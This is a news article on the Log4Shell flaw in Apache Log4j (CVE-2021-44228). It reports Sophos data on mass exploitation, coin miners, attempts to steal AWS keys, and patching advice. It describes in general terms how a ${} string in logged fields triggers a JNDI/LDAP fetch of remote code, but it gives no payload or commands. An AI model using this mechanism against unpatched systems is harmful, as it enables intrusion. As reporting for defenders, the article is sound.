Critical security flaw being exploited all over the Internet
IT security company Sophos has detected a sharp increase in attacks exploiting the zero-day exploit in Apache’s Log4j.
Vulnerable organisations include Apple, Tencent, Valve, Google, Minecraft, Amazon, and Tesla, to name a few.
The exploit, dubbed Log4Shell and tracked as CVE-2021-44228, was initially detected by LunaSec on 9 December 2021. It allows an attacker to inject log messages or message parameters into server logs that load code from a remote server.
The infected server will then run that code via calls to the Java Naming and Directory Interface (JNDI).
Sophos also expects malicious actors to intensify and diversify their attack methods and possibly introduce malware in the near future.
“Since Dec. 9, Sophos has detected hundreds of thousands of attempts to remotely execute code using the Log4Shell vulnerability,” said Sophos senior threat researcher Sean Gallagher.
Sophos found that crypto mining botnets are some of the earliest to exploit the vulnerability. They tend to focus on Linux server platforms that are vulnerable to the exploit.
“Initially, these were Proof-of-Concept (PoC) exploit tests by security researchers and potential attackers, among others, as well as many online scans for the vulnerability,” Gallagher said.
“This was quickly followed by attempts to install coin miners, including the Kinsing miner botnet.”
The IT security company’s investigations also revealed attempts to retrieve information from services such as account information for Amazon Web Services and other private data.
looked at related network traffic, I am thinking that this is likely from a Find My iPhone related server (iOS sends it updated device name it appears).
as of this moment, I am also suddenly no longer able to reproduce this.
— Will Strafach (@chronic) December 11, 2021
“The most recent intelligence suggest attackers are trying to exploit the vulnerability to expose the keys used by Amazon Web Service accounts,” Gallagher said.
“There are also signs of attackers trying to exploit the vulnerability to install remote access tools in victim networks, possibly Cobalt Strike, a key tool in many ransomware attacks.”
According to Sophos, attempts to exploit network services begin by probing for different types, of which around 90% are focused on the Lightweight Directory Access Protocol (LDAP).
One researcher demonstrated how the exploit could be used to attack a vulnerability in Apple’s servers and promptly informed the company of the issue.
Based on follow-up reports, Apple patched the vulnerability within hours.
Cloudflare CEO Matthew Prince said that they found evidence suggesting that the Log4j exploit was used in the wild as early as 1 December.
“That suggests it was in the wild at least nine days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure,” Prince stated.
According to a report from ArsTechnica, Log4Shell was first identified through sites catering to Minecraft players.
The sites displayed messages warning that hackers could execute malicious code on servers or clients running Minecraft’s Java platform by manipulating log messages.
Log4j forms part of many popular frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink.
That means that significant numbers of third-party apps could also be vulnerable to exploits of the same high severity as those threatening Minecraft users.
How the Log4J exploit works
Gallagher outlined the severity of the Log4Shell vulnerability.
“The Log4Shell vulnerability presents a different kind of challenge for defenders,” Gallagher said.
“Many software vulnerabilities are limited to a specific product or platform, such as the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange. Once defenders know what software is vulnerable, they can check for and patch it.”
“However, Log4Shell is a library that is used by many products. It can therefore be present in the darkest corners of an organisation’s infrastructure, for example any software developed in-house. Finding all systems that are vulnerable because of Log4Shell should be a priority for IT security,” he added.
According to ArsTechnica, Log4j will interpret a log message as a URL, go and fetch it, and even execute any executable payload it contains with the full privileges of the main program.
Exploits are triggered inside text using the ${} syntax and allowing them to be included in browser user agents or other commonly-logged attributes.
Gallagher further emphasised the need for Apache Log4j users to update and monitor their network activity.
“Once an attacker has secured access to a network, then any infection can follow,” he said.
“Therefore, alongside the software update already released by Apache in Log4j 2.15.0, IT security teams need to do a thorough review of activity on the network to spot and remove any traces of intruders, even if it just looks like nuisance commodity malware.”
Loading ...